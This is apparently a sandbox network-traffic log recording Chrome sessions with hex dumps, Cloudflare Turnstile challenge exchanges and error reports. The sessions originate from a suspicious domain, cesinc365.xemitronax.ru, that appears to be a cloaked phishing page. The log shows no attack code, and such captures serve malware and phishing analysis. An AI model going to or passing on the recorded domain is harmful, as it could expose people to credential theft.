                                                          2025-01-09 20:12:17 UTC1369INData Raw: 4e 62 34 74 77 63 58 4e 61 57 4a 6d 44 63 58 75 6a 70 61 43 54 6e 5a 53 62 6e 6f 57 6c 59 59 56 39 61 58 79 49 74 49 39 79 73 4b 79 4f 64 62 57 59 65 70 43 58 71 70 31 38 78 58 32 6d 78 70 33 4b 6b 38 4f 6f 79 34 72 4b 75 59 72 4e 78 72 47 4f 71 74 4c 42 6b 73 76 4f 75 5a 61 6f 32 73 6d 61 30 64 62 42 6e 71 37 69 30 61 4c 66 33 73 6d 6d 76 4f 72 5a 71 75 58 6d 30 61 37 43 78 72 6a 51 73 72 54 61 79 73 62 61 2f 73 76 53 2b 2b 33 79 2f 62 30 4b 32 74 37 39 41 50 66 48 34 51 45 4e 38 51 77 4c 42 64 58 34 43 50 72 54 45 78 63 48 36 68 30 4a 2b 39 73 55 42 53 59 48 47 52 51 6e 48 65 63 4a 35 79 7a 6c 2f 76 34 6c 46 51 6e 79 44 51 63 79 39 67 34 70 44 44 6f 63 4e 78 49 4d 2b 53 42 46 51 7a 63 34 43 42 78 48 51 44 56 47 51 45 63 4e 52 78 35 4a 54 54 34 34 54 52
                                                          Data Ascii: Nb4twcXNaWJmDcXujpaCTnZSbnoWlYYV9aXyItI9ysKyOdbWYepCXqp18xX2mxp3Kk8Ooy4rKuYrNxrGOqtLBksvOuZao2sma0dbBnq7i0aLf3smmvOrZquXm0a7CxrjQsrTaysba/svS++3y/b0K2t79APfH4QEN8QwLBdX4CPrTExcH6h0J+9sUBSYHGRQnHecJ5yzl/v4lFQnyDQcy9g4pDDocNxIM+SBFQzc4CBxHQDVGQEcNRx5JTT44TR
                                                          2025-01-09 20:12:17 UTC1369INData Raw: 6b 5a 36 62 6d 57 42 33 6c 57 53 57 66 61 6d 4a 71 71 4e 6f 61 35 75 71 6a 4a 35 2f 71 71 6d 30 6f 36 65 53 63 5a 53 75 6a 59 74 79 6c 59 43 42 65 6f 43 37 77 59 65 42 73 36 62 4e 6c 5a 32 72 30 49 65 51 7a 4a 53 6f 79 70 4b 50 6f 72 65 75 6b 73 32 36 6c 38 43 61 30 39 58 67 33 35 7a 48 76 62 48 67 77 75 43 31 78 4d 65 35 71 62 37 4f 7a 75 76 6d 79 66 6a 61 7a 75 54 57 39 50 37 49 75 66 33 30 38 76 7a 44 34 39 6e 53 76 39 50 6f 36 4e 58 67 32 39 34 4a 36 4f 33 30 41 67 33 6e 2b 52 54 54 32 78 33 54 44 50 66 78 45 76 63 61 34 50 67 5a 33 66 48 6a 41 78 72 38 43 2b 51 64 4a 77 63 65 4c 77 41 4c 43 79 73 6c 44 42 44 79 4d 67 66 38 44 54 2f 36 41 7a 49 39 39 78 63 70 2f 6b 4d 4c 52 7a 56 50 42 78 67 77 55 53 4d 55 4d 54 41 73 53 43 70 4c 57 52 59 35 47 79 77
                                                          Data Ascii: kZ6bmWB3lWSWfamJqqNoa5uqjJ5/qqm0o6eScZSujYtylYCBeoC7wYeBs6bNlZ2r0IeQzJSoypKPoreuks26l8Ca09Xg35zHvbHgwuC1xMe5qb7OzuvmyfjazuTW9P7Iuf308vzD49nSv9Po6NXg294J6O30Ag3n+RTT2x3TDPfxEvca4PgZ3fHjAxr8C+QdJwceLwALCyslDBDyMgf8DT/6AzI99xcp/kMLRzVPBxgwUSMUMTAsSCpLWRY5Gyw
                                                          2025-01-09 20:12:17 UTC1369INData Raw: 48 75 53 6d 5a 64 39 67 4a 6d 4b 6d 59 36 70 66 70 32 73 66 36 47 4f 6a 6f 35 34 70 49 68 76 72 4b 70 2f 6f 6f 33 41 6a 4c 7a 45 66 62 4b 65 75 4d 75 65 72 59 75 6e 70 4b 33 50 6f 62 57 66 79 38 36 57 32 74 6e 45 74 64 53 38 34 4a 76 66 74 37 58 50 35 4e 53 38 74 39 33 6a 70 73 72 48 71 74 2b 73 79 64 79 6c 37 63 76 4e 7a 50 65 31 32 4f 36 33 7a 76 6a 35 2b 74 4c 71 34 4d 37 6b 78 66 58 37 43 39 7a 55 34 51 6e 69 36 77 48 50 7a 77 2f 6f 43 51 48 6e 43 67 73 54 2f 4f 76 63 47 75 37 72 45 66 44 38 41 66 37 78 41 42 76 6c 2f 66 37 35 49 66 77 48 4b 66 44 6b 43 52 45 78 38 43 45 30 43 53 38 72 46 42 55 56 39 7a 39 41 41 7a 6b 6b 2f 45 51 64 49 7a 6b 64 4a 78 6c 42 43 53 38 4d 4d 53 4d 54 43 79 6f 6e 52 7a 46 46 4b 6a 4d 37 4d 6a 41 32 59 46 78 5a 4d 32 55 32
                                                          Data Ascii: HuSmZd9gJmKmY6pfp2sf6GOjo54pIhvrKp/oo3AjLzEfbKeuMuerYunpK3PobWfy86W2tnEtdS84Jvft7XP5NS8t93jpsrHqt+sydyl7cvNzPe12O63zvj5+tLq4M7kxfX7C9zU4Qni6wHPzw/oCQHnCgsT/OvcGu7rEfD8Af7xABvl/f75IfwHKfDkCREx8CE0CS8rFBUV9z9AAzkk/EQdIzkdJxlBCS8MMSMTCyonRzFFKjM7MjA2YFxZM2U2
                                                          2025-01-09 20:12:17 UTC1369INData Raw: 75 4e 6f 6f 39 75 72 34 36 78 6b 4b 35 78 6a 6e 43 50 64 70 4b 59 71 48 75 38 77 72 32 54 72 33 76 41 67 34 6a 43 78 59 61 69 74 73 4f 66 71 70 7a 53 6b 4d 2f 57 79 5a 48 59 78 74 47 58 32 4e 62 5a 71 4c 58 69 32 71 44 66 31 74 4b 68 73 72 6a 71 75 64 66 65 33 37 72 62 36 2b 6e 48 38 2b 2f 73 78 61 37 52 36 4c 76 47 32 66 54 52 32 76 50 35 31 64 37 4f 2b 41 50 34 43 2f 6a 30 42 66 37 64 2b 77 6e 62 41 77 66 73 37 63 33 50 45 76 4d 50 37 63 34 61 47 4f 6a 31 38 52 6f 6a 44 79 45 64 4a 76 44 6c 4b 78 55 74 33 77 30 64 47 53 41 72 38 41 59 56 4a 51 38 4f 39 6a 45 62 37 69 34 36 4c 6a 41 65 47 42 4e 46 45 78 51 47 41 54 55 58 43 54 55 72 44 45 51 49 48 6b 55 4d 52 45 64 51 49 6b 59 78 45 52 55 34 58 6a 6c 41 4e 6c 52 4c 58 7a 51 39 51 56 46 6a 4a 53 4a 49 52
                                                          Data Ascii: uNoo9ur46xkK5xjnCPdpKYqHu8wr2Tr3vAg4jCxYaitsOfqpzSkM/WyZHYxtGX2NbZqLXi2qDf1tKhsrjqudfe37rb6+nH8+/sxa7R6LvG2fTR2vP51d7O+AP4C/j0Bf7d+wnbAwfs7c3PEvMP7c4aGOj18RojDyEdJvDlKxUt3w0dGSAr8AYVJQ8O9jEb7i46LjAeGBNFExQGATUXCTUrDEQIHkUMREdQIkYxERU4XjlANlRLXzQ9QVFjJSJIR
                                                          2025-01-09 20:12:17 UTC1369INData Raw: 52 6a 6f 57 52 62 6e 61 6a 6d 61 6d 50 6a 6e 57 55 73 73 4e 39 6b 34 2f 45 6f 6f 43 2b 6e 4b 7a 41 68 4b 4f 6a 79 64 43 2f 77 62 32 65 70 4b 62 4f 6d 4a 57 70 70 35 4f 63 30 4c 50 58 6c 4e 4b 76 73 64 6a 6d 79 63 62 6d 31 71 58 73 70 74 44 6b 36 64 2f 4f 34 73 66 46 74 72 4f 78 32 65 72 39 2f 4e 6e 37 75 4c 66 4f 38 66 37 61 31 39 48 52 33 38 6a 42 43 77 72 62 42 74 44 6a 33 77 62 6e 42 66 62 68 45 4f 33 4d 31 67 6e 6e 32 68 4c 31 39 67 48 30 33 50 4c 35 4a 2f 49 6e 43 2b 55 46 36 41 58 6c 43 67 34 4e 4d 43 59 6f 43 43 6f 46 47 51 73 76 4b 6a 54 2b 44 2f 34 50 45 68 45 78 50 30 51 46 4e 51 67 4a 53 54 34 41 50 68 34 4f 4a 51 39 53 4d 31 4d 56 4a 54 55 69 50 43 51 79 50 6c 55 31 4b 31 4a 63 54 47 51 2f 58 47 5a 48 61 6b 73 2f 53 46 6c 6e 50 56 35 67 52 32
                                                          Data Ascii: RjoWRbnajmamPjnWUssN9k4/EooC+nKzAhKOjydC/wb2epKbOmJWpp5Oc0LPXlNKvsdjmycbm1qXsptDk6d/O4sfFtrOx2er9/Nn7uLfO8f7a19HR38jBCwrbBtDj3wbnBfbhEO3M1gnn2hL19gH03PL5J/InC+UF6AXlCg4NMCYoCCoFGQsvKjT+D/4PEhExP0QFNQgJST4APh4OJQ9SM1MVJTUiPCQyPlU1K1JcTGQ/XGZHaks/SFlnPV5gR2
                                                          2025-01-09 20:12:17 UTC1369INData Raw: 6e 4a 61 79 6b 72 2b 78 76 63 4b 69 6b 63 53 45 74 59 4c 49 69 4c 69 64 6d 36 4b 72 71 34 4f 67 6b 36 72 50 71 38 72 43 79 4c 6d 6e 74 36 6e 56 6b 62 36 32 6e 64 62 52 76 64 62 43 31 63 72 53 33 36 6d 31 70 65 62 75 76 38 6a 6c 7a 4e 37 44 39 76 62 30 39 75 50 47 74 76 50 67 41 64 48 6a 32 4e 63 42 32 41 66 35 78 4e 58 34 33 77 58 32 33 64 67 42 45 77 54 74 35 67 49 56 45 76 54 74 46 2b 2f 34 38 52 76 7a 2f 50 55 66 39 77 48 35 49 2f 73 46 2f 53 63 41 43 51 49 72 42 41 30 47 4c 77 67 52 43 6a 4d 4d 46 51 34 33 45 42 6b 53 4f 78 51 64 46 6a 38 59 49 52 70 44 48 43 55 65 52 79 41 70 49 6b 73 6b 4c 53 5a 50 4a 55 35 4e 57 42 63 59 4f 6c 77 64 4f 44 49 53 45 31 74 59 56 42 74 61 5a 44 30 62 59 53 4e 6d 4b 55 52 59 59 43 63 2b 52 57 59 72 52 6d 6c 53 4f 46 4e
                                                          Data Ascii: nJaykr+xvcKikcSEtYLIiLidm6Krq4Ogk6rPq8rCyLmnt6nVkb62ndbRvdbC1crS36m1pebuv8jlzN7D9vb09uPGtvPgAdHj2NcB2Af5xNX43wX23dgBEwTt5gIVEvTtF+/48Rvz/PUf9wH5I/sF/ScACQIrBA0GLwgRCjMMFQ43EBkSOxQdFj8YIRpDHCUeRyApIkskLSZPJU5NWBcYOlwdODISE1tYVBtaZD0bYSNmKURYYCc+RWYrRmlSOFN
                                                          2025-01-09 20:12:17 UTC1369INData Raw: 70 4b 41 6d 72 57 4f 74 38 57 67 6f 5a 36 2f 70 4d 7a 43 6d 62 71 77 6f 61 6e 54 70 36 7a 53 71 39 76 50 7a 61 6a 66 73 63 76 63 72 74 33 41 74 4e 76 64 78 4e 79 2b 71 4f 4b 34 79 4f 6e 5a 32 65 37 72 70 73 7a 33 37 63 58 58 35 65 54 6d 76 4f 76 51 36 64 37 30 76 41 62 63 78 67 4c 6f 77 38 54 57 33 67 6e 57 32 67 37 6f 43 64 50 71 36 41 2f 57 46 51 38 4d 36 52 49 4c 2f 4f 30 54 46 77 4c 79 45 52 54 35 39 42 67 4c 2b 53 33 37 44 76 72 76 48 79 55 6e 4c 79 33 7a 45 6a 6a 34 46 52 55 37 48 44 77 31 43 77 38 64 44 79 49 53 48 51 4d 42 47 55 73 4b 4a 7a 67 66 44 45 73 5a 4d 6a 74 53 4a 6c 41 76 52 43 78 4b 55 44 46 62 55 56 4e 41 4f 56 55 68 4d 6b 31 5a 52 79 52 70 4b 54 51 35 52 32 4e 4b 63 56 73 36 59 57 39 6d 64 45 6c 73 62 6a 6f 32 4f 30 74 51 50 46 70 2b
                                                          Data Ascii: pKAmrWOt8WgoZ6/pMzCmbqwoanTp6zSq9vPzajfscvcrt3AtNvdxNy+qOK4yOnZ2e7rpsz37cXX5eTmvOvQ6d70vAbcxgLow8TW3gnW2g7oCdPq6A/WFQ8M6RIL/O0TFwLyERT59BgL+S37DvrvHyUnLy3zEjj4FRU7HDw1Cw8dDyISHQMBGUsKJzgfDEsZMjtSJlAvRCxKUDFbUVNAOVUhMk1ZRyRpKTQ5R2NKcVs6YW9mdElsbjo2O0tQPFp+


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.44976235.190.80.14436092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-09 20:12:18 UTC542OUTOPTIONS /report/v4?s=VsW10caaSEv3BXHBOFrlTf5Iwt5dV3lCAutlthbnB%2FGWPEtK2NTn334xBnsa9SiDQ%2F8nHl2H6nUU88IyM6YreVjQgCGAo2VhV0T%2BMdwBG0M2PNh1ebKbDtyRWny08w%3D%3D HTTP/1.1
                                                          Host: a.nel.cloudflare.com
                                                          Connection: keep-alive
                                                          Origin: https://cesinc365.xemitronax.ru
                                                          Access-Control-Request-Method: POST
                                                          Access-Control-Request-Headers: content-type
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-09 20:12:18 UTC336INHTTP/1.1 200 OK
                                                          Content-Length: 0
                                                          access-control-max-age: 86400
                                                          access-control-allow-methods: OPTIONS, POST
                                                          access-control-allow-origin: *
                                                          access-control-allow-headers: content-length, content-type
                                                          date: Thu, 09 Jan 2025 20:12:17 GMT
                                                          Via: 1.1 google
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.449764104.18.94.414436092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-09 20:12:18 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/2140440123:1736450218:Qkz8xK01k7_d2gYcFjCrxwUowfxFCy7ft3oS6awrjsg/8ff714c8fb27c325/sTdnSaHhRiOYCdlUNJBeHl4xjfNSjuWryxpE02IyMzY-1736453536-1.1.1.1-toETkGxCtlpdHd.Hhj2xL6YIwSfxnhq5vsxZRCl6FqdupSx8Om5i5Z870y.q7X.k HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-09 20:12:18 UTC375INHTTP/1.1 404 Not Found
                                                          Date: Thu, 09 Jan 2025 20:12:18 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 7
                                                          Connection: close
                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                          cf-chl-out: IY3Sf+55crH4PpPrVnpeYw==$71D75Av0Xzk55AmeX1glMg==
                                                          Server: cloudflare
                                                          CF-RAY: 8ff714d96d8c8c89-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2025-01-09 20:12:18 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                          Data Ascii: invalid


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.44976535.190.80.14436092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-09 20:12:18 UTC476OUTPOST /report/v4?s=VsW10caaSEv3BXHBOFrlTf5Iwt5dV3lCAutlthbnB%2FGWPEtK2NTn334xBnsa9SiDQ%2F8nHl2H6nUU88IyM6YreVjQgCGAo2VhV0T%2BMdwBG0M2PNh1ebKbDtyRWny08w%3D%3D HTTP/1.1
                                                          Host: a.nel.cloudflare.com
                                                          Connection: keep-alive
                                                          Content-Length: 441
                                                          Content-Type: application/reports+json
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-09 20:12:18 UTC441OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 36 32 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 63 65 73 69 6e 63 33 36 35 2e 78 65 6d 69 74 72 6f 6e 61 78 2e 72 75 2f 39 46 41 76 6e 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65
                                                          Data Ascii: [{"age":0,"body":{"elapsed_time":621,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://cesinc365.xemitronax.ru/9FAvn/","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":404,"type":"http.error"},"type":"network-e
                                                          2025-01-09 20:12:19 UTC168INHTTP/1.1 200 OK
                                                          Content-Length: 0
                                                          date: Thu, 09 Jan 2025 20:12:18 GMT
                                                          Via: 1.1 google
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.449766104.18.95.414436092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-09 20:12:19 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/8ff714c8fb27c325/1736453537880/TCoQzFc-1Z86YKl HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/pzzoe/0x4AAAAAAA3bgXiDXCFJKrv3/auto/fbE/normal/auto/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-09 20:12:19 UTC200INHTTP/1.1 200 OK
                                                          Date: Thu, 09 Jan 2025 20:12:19 GMT
                                                          Content-Type: image/png
                                                          Content-Length: 61
                                                          Connection: close
                                                          Server: cloudflare
                                                          CF-RAY: 8ff714db88677d14-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2025-01-09 20:12:19 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 4f 00 00 00 5a 08 02 00 00 00 76 4d 9c f9 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                          Data Ascii: PNGIHDROZvMIDAT$IENDB`


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          19192.168.2.449767104.18.94.414436092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-09 20:12:19 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8ff714c8fb27c325/1736453537880/TCoQzFc-1Z86YKl HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-09 20:12:19 UTC200INHTTP/1.1 200 OK
                                                          Date: Thu, 09 Jan 2025 20:12:19 GMT
                                                          Content-Type: image/png
                                                          Content-Length: 61
                                                          Connection: close
                                                          Server: cloudflare
                                                          CF-RAY: 8ff714dfbb270fab-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2025-01-09 20:12:19 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 4f 00 00 00 5a 08 02 00 00 00 76 4d 9c f9 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                          Data Ascii: PNGIHDROZvMIDAT$IENDB`


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          20192.168.2.449768104.18.95.414436092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-09 20:12:20 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/8ff714c8fb27c325/1736453537883/03831841271b98307c37aaa89aea0ab835898c545ed3320b0501ee93361c0c92/7XzLK_UGDfcbQyz HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          Cache-Control: max-age=0
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/pzzoe/0x4AAAAAAA3bgXiDXCFJKrv3/auto/fbE/normal/auto/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-09 20:12:20 UTC143INHTTP/1.1 401 Unauthorized
                                                          Date: Thu, 09 Jan 2025 20:12:20 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Content-Length: 1
                                                          Connection: close
                                                          2025-01-09 20:12:20 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 41 34 4d 59 51 53 63 62 6d 44 42 38 4e 36 71 6f 6d 75 6f 4b 75 44 57 4a 6a 46 52 65 30 7a 49 4c 42 51 48 75 6b 7a 59 63 44 4a 49 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                          Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gA4MYQScbmDB8N6qomuoKuDWJjFRe0zILBQHukzYcDJIAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                          2025-01-09 20:12:20 UTC1INData Raw: 4a
                                                          Data Ascii: J


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          21192.168.2.449769104.18.95.414436092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-09 20:12:21 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/2140440123:1736450218:Qkz8xK01k7_d2gYcFjCrxwUowfxFCy7ft3oS6awrjsg/8ff714c8fb27c325/sTdnSaHhRiOYCdlUNJBeHl4xjfNSjuWryxpE02IyMzY-1736453536-1.1.1.1-toETkGxCtlpdHd.Hhj2xL6YIwSfxnhq5vsxZRCl6FqdupSx8Om5i5Z870y.q7X.k HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          Content-Length: 32145
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          Content-type: application/x-www-form-urlencoded
                                                          CF-Chl-RetryAttempt: 0
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          CF-Challenge: sTdnSaHhRiOYCdlUNJBeHl4xjfNSjuWryxpE02IyMzY-1736453536-1.1.1.1-toETkGxCtlpdHd.Hhj2xL6YIwSfxnhq5vsxZRCl6FqdupSx8Om5i5Z870y.q7X.k
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Origin: https://challenges.cloudflare.com
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/pzzoe/0x4AAAAAAA3bgXiDXCFJKrv3/auto/fbE/normal/auto/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-09 20:12:21 UTC16384OUTData Raw: 76 5f 38 66 66 37 31 34 63 38 66 62 32 37 63 33 32 35 3d 34 54 35 30 6f 69 56 49 4c 4f 54 4e 54 4e 73 54 56 25 32 62 56 4f 6b 76 69 47 41 68 47 69 51 4e 4d 30 72 41 52 53 4e 44 30 65 54 4e 49 4e 61 30 51 41 2b 56 51 4e 58 48 30 71 4c 69 69 4e 7a 71 55 4e 52 76 30 4e 74 47 76 52 70 6f 4e 71 41 4e 24 52 4e 2b 61 4e 6a 6f 58 54 30 69 4e 71 4b 75 6b 4f 59 30 68 4d 70 4e 75 6f 48 2b 64 35 41 65 30 68 41 56 4e 59 44 69 59 4e 51 76 69 55 73 55 51 75 4e 4e 75 4e 65 4c 4e 4d 68 31 33 30 30 4e 52 71 4e 4e 42 70 4e 4e 34 48 35 63 67 69 4c 4e 71 47 4c 24 58 46 50 55 6f 4e 52 5a 71 4c 4a 64 53 37 68 74 4e 56 74 55 71 48 64 64 65 47 4c 44 4e 4f 2d 4f 64 69 2b 46 69 2b 6a 44 4e 35 75 73 49 30 30 73 31 39 4c 44 49 4c 6b 69 74 24 6b 66 4e 74 39 66 67 43 4a 67 6e 59 4b 78
                                                          Data Ascii: v_8ff714c8fb27c325=4T50oiVILOTNTNsTV%2bVOkviGAhGiQNM0rARSND0eTNINa0QA+VQNXH0qLiiNzqUNRv0NtGvRpoNqAN$RN+aNjoXT0iNqKukOY0hMpNuoH+d5Ae0hAVNYDiYNQviUsUQuNNuNeLNMh1300NRqNNBpNN4H5cgiLNqGL$XFPUoNRZqLJdS7htNVtUqHddeGLDNO-Odi+Fi+jDN5usI00s19LDILkit$kfNt9fgCJgnYKx
                                                          2025-01-09 20:12:21 UTC15761OUTData Raw: 56 61 69 44 56 2b 4e 65 4e 58 44 71 30 69 4c 4e 54 4e 78 4e 45 4e 4a 76 68 76 56 65 4e 2d 4e 65 35 69 41 56 31 30 2b 30 52 53 56 31 4e 43 30 56 6e 30 45 4e 65 76 71 47 56 6f 2b 66 76 58 6b 56 34 4e 4e 76 56 73 56 79 4e 76 44 69 30 4e 73 76 59 44 71 53 4e 58 4e 65 4e 68 49 4e 30 4e 6f 30 2b 79 56 6f 72 35 35 71 4e 56 69 30 59 4e 69 31 56 41 30 52 4e 69 45 30 6f 45 59 38 69 72 61 70 4e 6f 4e 69 73 4e 70 30 65 4e 52 61 56 4e 44 56 30 51 4c 69 76 4e 41 30 74 4e 56 6a 69 64 74 33 4f 4e 50 44 6b 4a 45 35 56 35 4c 72 30 72 54 52 24 35 66 38 47 53 4e 4f 4e 65 50 58 37 64 50 4c 2b 30 74 76 6a 49 61 52 69 6f 50 61 38 58 75 79 52 44 6a 70 37 71 48 62 74 61 4f 6d 52 48 55 50 61 63 37 56 6c 44 75 79 48 73 35 43 42 6a 35 4d 47 6b 43 6d 71 79 70 30 24 54 52 4c 4e 30 7a
